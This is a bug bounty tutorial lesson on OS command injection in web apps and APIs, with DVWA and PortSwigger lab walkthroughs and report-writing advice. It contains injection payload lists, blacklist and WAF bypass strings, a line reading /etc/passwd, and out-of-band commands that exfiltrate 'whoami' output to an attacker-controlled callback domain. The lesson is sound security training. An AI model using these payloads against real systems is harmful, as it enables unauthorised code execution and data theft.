Bug Bounty Course -- Day 14 of 60
23%

BB Day 14: Command Injection Bug Bounty 2026 — Find OS Injection in Web Apps & APIs That Pay

Mr Elite 16 min read Bug Bounty Course -- Day 14
BB Day 14: Command Injection Bug Bounty 2026 — Find OS Injection in Web Apps & APIs That Pay
DAY 14
🎯 BUG BOUNTY COURSE
FREE

Part of the 60-Day Bug Bounty Mastery Course

Day 14 of 60 · 23.3% complete

⚠️ Authorised Testing Only: Test command injection exclusively on platforms where you have explicit permission — bug bounty program scope, DVWA, PortSwigger Web Academy, or your own lab. Executing OS commands on systems you do not own is a criminal offence under the Computer Fraud and Abuse Act and equivalent legislation worldwide.
Command injection bug bounty in 2026 is one of the most lucrative vulnerability classes you will ever find — programmes routinely pay Critical severity for a single confirmed finding, with payouts reaching $30,000 on high-value assets. The reason it pays so well is the reason it is so dangerous: when you find command injection, you are not just reading a database — you are executing operating system commands on the server itself. Today you will learn exactly where to find it, how to prove it safely, and how to write a report that gets paid without dispute.

🎯 What You’ll Master in Day 14

Identify all potential command injection entry points in web applications and APIs
Test with all five injection operators and understand when each triggers execution
Detect blind command injection using time-delay and out-of-band techniques
Bypass common input filters and WAF rules blocking injection characters
Write a Critical-severity command injection report that gets paid fast

⏱️ 52 min read · 3 hands-on exercises

📊 Have you found a command injection vulnerability before?




✅ Perfect starting point wherever you are. If you are starting from zero, the entry-point identification section will open your eyes to how common this vulnerability is. Advanced hunters — jump to the filter bypass and out-of-band sections for techniques most reports miss.

📋 What You’ll Master in Day 14 — Command Injection Bug Bounty Tutorial

  1. What Is Command Injection Bug Bounty and Why It Pays Critical
  2. Where to Find Command Injection Entry Points in Real Applications
  3. Detecting Blind Command Injection With Time Delays and Callbacks
  4. Command Injection Payloads — Testing All Five Operators Systematically
  5. Bypassing Blacklist Filters and WAF Rules in 2026
  6. Remote Code Execution Bug Bounty — Writing the Report That Gets Paid

In Day 13 we used XXE injection to make servers fetch internal resources and leak files. Today we go further up the impact scale. Command injection does not just read files — it executes arbitrary operating system commands on the server. This is the vulnerability class that ends penetration tests early because there is simply nothing left to demonstrate after you have a shell. The 60-Day Bug Bounty Mastery Course covers it here because understanding RCE changes how you think about every other vulnerability.

What Is Command Injection Bug Bounty and Why It Pays Critical

Command injection occurs when an application passes user-controlled input to a system shell without proper sanitisation. The server calls a shell function — exec(), system(), popen(), or their equivalents — and your injected characters cause additional OS commands to execute alongside the intended operation. Unlike SQL injection, which talks to a database, command injection talks directly to the operating system.

The impact is severe by definition. With command injection you can read any file the web server process has access to, write files including web shells, establish reverse shell connections, enumerate internal network hosts, pivot to internal services, and exfiltrate data. Every major bug bounty platform classifies confirmed OS command injection on production infrastructure as Critical severity.

securityelites.com
Command Injection — How User Input Reaches the Shell
USER INPUT (browser form)
ip=8.8.8.8; cat /etc/passwd

↓ application passes directly to shell
SERVER EXECUTES
shell_exec(“ping -c 1 8.8.8.8; cat /etc/passwd“)

↓ both commands run
RESPONSE CONTAINS
PING output + /etc/passwd contents

📸 Command injection flow — user-controlled input appended with a semicolon causes the server to execute two commands: the intended ping and the injected cat /etc/passwd.

The reason command injection remains prevalent in 2026 is developer convenience. Calling a system utility with exec() is often faster to implement than using a language’s native library. Network diagnostic features, file processing tools, image converters, and PDF generators frequently use shell calls under the hood — and developers who build these features quickly rarely sanitise the input thoroughly.

Where to Find Command Injection Entry Points in Real Applications

The key to finding command injection efficiently is targeting features that are architecturally likely to involve OS calls. You are not testing random parameters — you are identifying specific application functionality that typically calls system utilities behind the scenes.

Network diagnostic features: Any “ping this host”, “traceroute”, “DNS lookup”, or “whois” functionality built into an application almost certainly calls the corresponding OS utility. These are the highest-yield targets for command injection and should be tested first on any application that has them.

File processing features: Image resizers, PDF generators, document converters, video thumbnail generators, and archive extractors frequently call OS utilities like ImageMagick, Ghostscript, FFmpeg, or unzip. Parameters controlling file format, quality, dimensions, or output path are injection candidates.

API endpoints accepting URLs or hostnames: Webhook validators, screenshot-as-a-service features, URL preview generators, and SSL certificate checkers often call curl, wget, or nslookup internally. Test any parameter that accepts a URL, hostname, or IP address.

Server-side monitoring and health features: Admin dashboards with server health checks, uptime monitors, and deployment tools are prime targets — they are admin-facing, frequently built quickly, and often call shell commands directly to check system status.

INITIAL COMMAND INJECTION TEST PAYLOADS
# For a ping-like feature accepting IP input, test each operator:
8.8.8.8; id
8.8.8.8 | id
8.8.8.8 && id
8.8.8.8 || id
8.8.8.8 `id`
8.8.8.8 $(id)
# If any returns uid= in the response — confirmed in-band injection
# If response is empty but delayed — likely blind injection (see next section)

🛠️ EXERCISE 1 — BROWSER (10 MIN · NO INSTALL)
Map Command Injection Entry Points on a Real Bug Bounty Target (Passive Recon)

⏱️ Time: 10 minutes · Browser only — no testing required

This exercise is pure reconnaissance — no payloads, no testing, just mapping.

Step 1: Go to HackerOne (hackerone.com) and find any public program
that includes *.example.com in scope (pick a large tech company).

Step 2: Browse their main application and list every feature that fits
these categories:
– Any form accepting an IP address, hostname, or domain
– Any file upload or conversion feature
– Any “test connection” or webhook validator
– Any admin or monitoring panel visible to your account level

Step 3: For each feature you find, write down:
– The URL of the feature
– What parameter accepts the input
– What OS utility you think it might call

Step 4: Prioritise your list — which feature is most architecturally
likely to call a shell command? That is your first test target.

Note: Do NOT send any test payloads. This exercise is mapping only.

✅ What you just learned: Command injection hunting starts before you send a single request. Identifying the right entry points — features architecturally connected to OS utilities — is what separates hunters who find this bug from those who test everything randomly and miss it. A properly mapped target takes 10 minutes and a focused test session takes 30. Random testing takes days and finds nothing.

📸 Screenshot your prioritised entry-point list and share in #day-14-cmdi on Discord.

Detecting Blind Command Injection With Time Delays and Callbacks

The majority of command injection vulnerabilities in modern applications are blind — the server executes your command but returns no output in the HTTP response. The application might return its normal response, an error, or nothing at all. Without knowing the technique, you would miss these entirely. With it, they become some of the most satisfying findings in bug bounty.

Time-delay detection: Inject a command that causes a measurable pause in execution. The classic technique is ; sleep 5 on Linux or & timeout /T 5 on Windows. If the server’s response takes exactly 5 seconds longer than normal, your command executed. This is definitive proof even without visible output. Always test with a 5-second delay first, then confirm with a 10-second delay to eliminate network jitter.

Out-of-band (OOB) detection: OOB techniques cause the server to make an outbound DNS or HTTP request to a server you control, proving execution without relying on the response. Burp Suite Pro includes Collaborator for this purpose. The free alternative is interactsh from ProjectDiscovery — an open-source OOB interaction server you can run yourself or use via their public instance.

BLIND COMMAND INJECTION DETECTION PAYLOADS
# Time-delay detection — Linux
; sleep 5
| sleep 5
$(sleep 5)
`sleep 5`
# Time-delay detection — Windows
& timeout /T 5 /NOBREAK
& ping -n 6 127.0.0.1
# Out-of-band — DNS callback (replace with your interactsh domain)
; nslookup YOUR-UNIQUE-ID.oast.me
; curl http://YOUR-UNIQUE-ID.oast.me
$(nslookup YOUR-UNIQUE-ID.oast.me)
# Exfiltrate data via DNS (hostname in subdomain)
; nslookup $(whoami).YOUR-UNIQUE-ID.oast.me
# If DNS shows whoami output as subdomain — confirmed blind RCE with data exfil

💡 Always Test Sleep Before OOB: Start with time-delay before setting up OOB infrastructure. A 5-second delay is faster to confirm and requires zero setup. Only move to OOB when time-delay is inconclusive — such as when the application has variable response times that make delay-based detection unreliable.

Command Injection Payloads — Testing All Five Operators Systematically

Different shell operators have different execution logic, and different applications use different parsing behaviour. Testing only semicolons is the most common mistake new hunters make — they miss half the vulnerabilities because the application blocks semicolons but not pipes. A systematic approach tests every operator every time.

securityelites.com
Command Injection Operators — Execution Logic Reference
;
Semicolon
Always executes second command regardless of first result

|
Pipe
Pipes first command output to second — second always runs

&&
AND
Second command only runs if first succeeds (exit code 0)

||
OR
Second command only runs if first fails (exit code ≠ 0)

$()
Subshell
Executes in subshell — bypasses some operator filters

📸 Command injection operator reference — each operator has different execution logic, requiring systematic testing of all five to ensure complete coverage.

Bypassing Blacklist Filters and WAF Rules in 2026

Modern applications and WAFs often blacklist obvious injection characters like semicolons and pipes. These filters are rarely complete, and there are reliable techniques to bypass them. Understanding bypass methods is what separates hunters who report findings from those who mark a parameter as “protected” and move on.

COMMAND INJECTION FILTER BYPASS TECHNIQUES
# URL encoding bypass — encode the separator character
8.8.8.8%3Bid # %3B = semicolon
8.8.8.8%0Aid # %0A = newline (often works when ; is blocked)
# IFS (Internal Field Separator) variable bypass
8.8.8.8${IFS}id
8.8.8.8${IFS}&&${IFS}id
# Wildcard bypass — avoid spelling out command name
; /usr/bin/i?
; /usr/bin/wh*
# Case variation bypass
; ID
; Id
# Backtick subshell when $() is filtered
; `id`
# Newline as separator (bypasses semicolon and pipe filters)
8.8.8.8
id

🌐 EXERCISE 2 — PORTSWIGGER (20 MIN)
Exploit Blind OS Command Injection Using Time Delays — PortSwigger Lab

⏱️ Time: 20 minutes · Free PortSwigger Web Security Academy account required

Step 1: Go to portswigger.net/web-security/os-command-injection
Step 2: Open the lab: “Blind OS command injection with time delays”
Step 3: The application has a feedback form — submit it normally first
and capture the request in Burp Suite proxy

Step 4: Send the captured POST request to Burp Repeater

Step 5: Identify the “email” parameter — this is vulnerable to injection

Step 6: Replace the email value with:
email=x||ping+-c+10+127.0.0.1||

Step 7: Click Send — observe the response time
A ~10 second delay confirms blind command injection

Step 8: Try the sleep payload as an alternative:
email=x||sleep+10||

Step 9: Once confirmed, attempt to exfiltrate the current user:
email=||nslookup+$(whoami)+YOUR-COLLABORATOR-ID.burpcollaborator.net||

Step 10: Check your Collaborator tab for the DNS interaction

✅ What you just learned: Blind command injection requires patience and methodology. The time-delay confirmation step is non-negotiable — you must prove execution before attempting data exfiltration. This exact lab scenario mirrors real-world findings: a feedback form, no visible output, injectable email field, and OOB confirmation. This is the pattern you will encounter repeatedly in real bug bounty programs.

📸 Screenshot the Repeater response time showing the delay and share in #day-14-cmdi on Discord.

Remote Code Execution Bug Bounty — Writing the Report That Gets Paid

A confirmed command injection finding can be rejected or significantly downgraded if the report is poorly written. The difference between a $500 payout and a $15,000 payout is often the quality of the report — specifically how clearly you establish impact, provide reproducible proof, and communicate the business risk in terms programme managers understand.

Proof of Concept Requirements: Your PoC must include the exact HTTP request with the injection payload (use Burp’s “Copy as curl command” feature), the server response showing command output or the time delay, and a clear explanation of how you confirmed execution. For blind injection, include the Collaborator DNS interaction log as a screenshot with timestamps.

Safe PoC Commands Only: Never run destructive commands in a bug bounty PoC. The standard safe commands are id (shows current user), whoami, hostname, and uname -a. These prove execution without causing harm or accessing sensitive data unnecessarily. Never run rm, shutdown, or commands that modify files on production systems.

Impact Statement: Translate technical findings into business risk. “An attacker could execute arbitrary OS commands on the production server, potentially accessing all database credentials stored in environment variables, establishing persistent backdoor access, and pivoting to internal network services not exposed to the internet.” Programme managers respond to business language, not technical jargon alone.

⚡ EXERCISE 3 — KALI TERMINAL (25 MIN)
Exploit DVWA Command Injection at All Four Security Levels Using Burp Repeater

⏱️ Time: 25 minutes · DVWA running, Burp Suite configured

DVWA COMMAND INJECTION — ALL SECURITY LEVELS
# Navigate to DVWA Command Injection module
http://127.0.0.1/dvwa/vulnerabilities/exec/
# Intercept the ping request in Burp and send to Repeater
## SECURITY LEVEL: LOW
ip=127.0.0.1;id&Submit=Submit
uid=33(www-data) gid=33(www-data)
## SECURITY LEVEL: MEDIUM (blocks ; and &&)
ip=127.0.0.1|id&Submit=Submit
uid=33(www-data) gid=33(www-data)
## SECURITY LEVEL: HIGH (blocks most operators)
ip=127.0.0.1| id&Submit=Submit
# Note the space after pipe — bypasses High filter
## SECURITY LEVEL: IMPOSSIBLE
# Uses intval() to cast input to integer — injection not possible
# Study the source code: Settings > View Source to understand the fix
# Key learning: proper input validation (whitelist, not blacklist) prevents injection

✅ What you just learned: The progression from Low to Impossible in DVWA demonstrates the entire lifecycle of filter bypass — from no protection, through blacklist bypasses, to the only real fix: whitelist validation that accepts only a strictly defined format. In bug bounty, most real applications sit at the Medium or High level equivalent — they have some filtering, but it is incomplete. The bypass techniques you just used work against real production systems using the same incomplete blacklist approach.

📸 Screenshot the successful injection output at each security level and share in #day-14-cmdi on Discord. Tag #cmdi2026

🧠 QUICK CHECK — Day 14

You inject ; sleep 5 into a ping field. The response takes exactly 5.2 seconds longer than previous requests. The response body contains no output from the sleep command. What has this confirmed?



📋 Key Payloads — Day 14 Command Injection Reference

; idIn-band injection — semicolon separator, shows current user
| idIn-band injection — pipe separator
$(id)Subshell injection — bypasses some operator blacklists
; sleep 5Blind time-delay detection — confirms execution without output
%0AidNewline separator — bypasses semicolon and pipe filters
; nslookup $(whoami).YOUR.oast.meOOB data exfiltration via DNS — confirms blind RCE
${IFS}idIFS variable bypass — avoids space character in filtered inputs

🏆 Mark Day 14 as Complete

You now understand one of the highest-paying vulnerability classes in bug bounty. The time-delay and OOB techniques you learned today are what separate $500 reports from $15,000 Critical findings.


❓ Frequently Asked Questions

How much does command injection pay in bug bounty programs?
Command injection with demonstrable remote code execution typically pays Critical severity — between $3,000 and $30,000+ depending on the program. HackerOne and Bugcrowd both classify OS command injection as Critical when it affects production systems. Blind command injection without full RCE proof pays High. The exact payout depends on the program scope, asset criticality, and the impact you demonstrate in your report.
What is the difference between in-band and blind command injection?
In-band command injection returns the output of your injected command directly in the HTTP response. Blind command injection executes your command server-side but returns no output in the response. You detect blind injection using time-based techniques or out-of-band techniques involving DNS/HTTP callbacks to a server you control.
Which injection operators should I test first?
Test in this order: semicolon, pipe, double ampersand, double pipe, and backtick subshell. Each operator has different execution logic — testing all five covers the full range of shell parsing behaviour. A WAF might block semicolons but not newlines or subshells, so incomplete testing leaves money on the table.
How do I prove command injection without reading sensitive files?
The safest proof-of-concept is a DNS callback using interactsh or Burp Collaborator. Inject a command like nslookup your-unique-id.oast.me — when the server makes the DNS lookup, you have irrefutable proof of execution. Use id, whoami, and hostname for safe output-based PoCs. Never run destructive commands on production systems.
Can command injection exist in API endpoints?
Yes — APIs are frequently overlooked and often less protected than visible web forms. Any API parameter passed to a system utility is a potential injection point. Common examples include image conversion APIs, PDF generators, DNS validation endpoints, and webhook URL validators. Always test JSON and XML body parameters with the same injection operators you use on form fields.
What comes after command injection in the Bug Bounty course?
Day 15 covers Business Logic Vulnerabilities — a category requiring no special payloads, only careful observation of how application workflows can be abused. Business logic bugs consistently rank among the highest-paying findings because automated scanners almost never detect them, making manual testers who understand them extremely valuable to programmes.
← Previous

Day 13: XXE Injection Bug Bounty 2026

Next →

Day 15: Business Logic Vulnerabilities

📚 Further Reading

  • XXE Injection Bug Bounty 2026 — Day 13 covers XML External Entity injection, SSRF chains, and out-of-band data exfiltration techniques that complement command injection hunting.
  • SQL Injection Tutorials — The web application SQL injection category covers manual injection, SQLmap automation, and database extraction techniques used alongside OS command injection.
  • 60-Day Bug Bounty Mastery Course — The full course hub with every day indexed from reconnaissance to advanced vulnerability chaining and $10K/month income strategy.
  • PortSwigger OS Command Injection Labs — The official PortSwigger Web Academy command injection track with six hands-on labs covering in-band, blind, time-delay, and OOB techniques.
  • OWASP Command Injection Reference — The definitive OWASP reference covering command injection prevention, language-specific vulnerable functions, and real-world case studies.
ME
Mr Elite
Owner, SecurityElites.com
I found my first command injection on a fintech company’s internal network diagnostic tool — a feature literally labelled “Ping Test” in their admin panel. The field accepted an IP address and passed it directly to ping without any sanitisation. I injected ; id and got www-data back in the response immediately. What stopped me cold was what came next: ; cat /proc/net/tcp showed the server had open connections to 12 other internal hosts. The entire internal network was reachable from that one unprotected form. The programme paid $8,500 Critical. The developer had built it in a weekend and never thought anyone would find it. That is the mindset you need: always test the features that look internal and hastily built.

blind command injection command injection bypass command injection payloads os command injection remote code execution bug bounty
Join free to earn XP for reading this article Track your progress, build streaks and compete on the leaderboard.
Join Free
Lokesh N. Singh aka Mr Elite
Lokesh N. Singh aka Mr Elite
Founder, Securityelites · AI Red Team Educator
Founder of Securityelites and creator of the SE-ARTCP credential. Working penetration tester focused on AI red team, prompt injection research, and LLM security education.
Linkedin Twitter
About Lokesh ->

Leave a Comment

Your email address will not be published. Required fields are marked *